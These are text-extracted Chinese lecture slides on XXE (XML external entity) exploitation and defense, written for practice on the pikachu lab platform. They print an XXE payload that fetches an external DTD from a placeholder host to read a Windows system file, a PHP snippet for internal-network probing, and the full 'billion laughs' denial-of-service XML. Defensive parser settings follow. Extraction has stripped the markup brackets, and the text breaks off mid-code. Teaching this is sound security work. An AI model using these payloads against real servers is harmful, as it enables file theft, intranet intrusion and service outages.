第42讲XML漏洞利用与防御98课件.pptxVIP

第42讲XML漏洞利用与防御任毅

引言XXE漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而，要去校验DTD(documenttypedefinition)中SYSTEM标识符定义的数据，并不容易，也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。

小测试XXE漏洞形成的原因是什么？

学习目标进一步熟悉XXE漏洞利用方法、XXE漏洞修复能利用pikachu平台完成XXE练习、增强网络安全意识

进行XXE注入攻击!DOCTYPEfoo[!ELEMENTfooANY!ENTITY%xxeSYSTEMhttp://xxx.xxx.xxx/evil.dtd%xxe;]fooevil;/foo外部evil.dtd中的内容。!ENTITYevilSYSTEM“file:///c:/windows/win.ini”将http://xxx.xxx.xxx/evil.dtd换成内网URL，还可以进行内网入侵。

内网探测/SSRF由于xml实体注入攻击可以利用http://协议，也就是可以发起http请求。可以利用该请求去探查内网，进行SSRF攻击。?php$xml=EOF?xmlversion=1.0?!DOCTYPEANY[!ENTITYfSYSTEM:80/]xf;/xEOF;$data=simplexml_load_string($xml);print_r($data);?

拒绝服务攻击Tocrashtheserver/Causedenialofservice:?xmlversion=1.0?!DOCTYPElolz[!ENTITYlollol!ENTITYlol2lol;lol;lol;lol;lol;lol;lol;lol;lol;lol;!ENTITYlol3lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;lol2;!ENTITYlol4lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;lol3;!ENTITYlol5lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;lol4;!ENTITYlol6lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;lol5;!ENTITYlol7lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;lol6;!ENTITYlol8lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;lol7;!ENTITYlol9lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;lol8;]lolzlol9;/lolz

拒绝服务攻击上面样例中的XXE漏洞攻击就是著名的“billionlaughs”攻击。(/wiki/Billion_laughs)，该攻击通过创建一项递归的XML定义，在内存中生成十亿个”Ha!”字符串，从而导致DDoS攻击。原理为：构造恶意的XML实体文件耗尽可用内存，因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中，解析非常慢，造成了拒绝服务器攻击。除了这些，攻击者还可以读取服务器上的敏感数据，还能通过端口扫描，获取后端系统的开放端口。

XML漏洞防御XXE漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而，要去校验DTD(documenttypedefinition)中SYSTEM标识符定义的数据，并不容易，也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。因此，最好的解决办法就是配置XML处理器去使用本地静态的DTD，不允许XML中含有任何自己声明的DTD。通过设置相应的属性值为false，XML外部实体攻击就能够被阻止。因此，可将外部实体、参数实体和内联DTD都被设置为False，从而避免基于XXE漏洞的攻击。

XML漏洞防御1、方案一：使用开发语言提供的禁用外部实体的方法（1）PHPlibxml_disable_entity_loader(true);（2）JAVADocumentBuilderFactorydbf=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);（3）PythonfromlxmlimportetreexmlData=etree.parse(xmlSource,etree.XMLParse